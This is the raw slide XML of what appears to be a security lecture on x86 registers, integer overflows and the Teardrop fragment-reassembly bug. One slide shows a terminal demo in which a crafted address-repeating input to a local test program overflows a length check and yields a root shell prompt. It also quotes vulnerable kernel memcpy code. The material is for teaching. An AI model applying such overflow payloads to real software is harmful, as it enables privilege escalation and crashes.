            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="833726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4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4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4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4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44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44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44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44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144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1446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1446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1446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144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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x86 Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1011715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Segment registers: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, ds, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used to select segments (e.g., code, data, stack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Program status and control: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eflags</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The instruction pointer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Points to the next instruction to be executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cannot be read or set explicitly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is modified by jump and call/return instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be read by executing a call and checking the value pushed on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Floating point units and mmx/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xmm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60310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1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1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1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1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17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17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17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17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1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3442" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213443" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>integeroverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  `python -c 'print "A" * 32000'`                                                                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>max 512 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> 32000                                                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>integeroverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  `python -c 'print "A" * 33000'`                                                                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>max 512 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -32536                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>integeroverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> `python -c 'print "\x58\xf4\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>" * 9000'`                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>max 512 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -29536                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#                                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62725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3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3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3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3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34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34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34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34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13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dirty="0" smtClean="0"/>
              <a:t>Integer Overflows: Teardrop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Denial-of-service attack that exploits a bug in the fragment reassembling routines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is the number of bytes copied so far </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>skb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is the total size of the datagram (after reassembly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>is the memory buffer where the datagram is being reassembled</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>qp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;fragments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>is the linked list of fragments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>qp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;fragments;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>while(</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 != NULL) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  if(count + </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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>skb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>error_too_big</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;} /* We don’t want a ping of death :) */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;offset), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
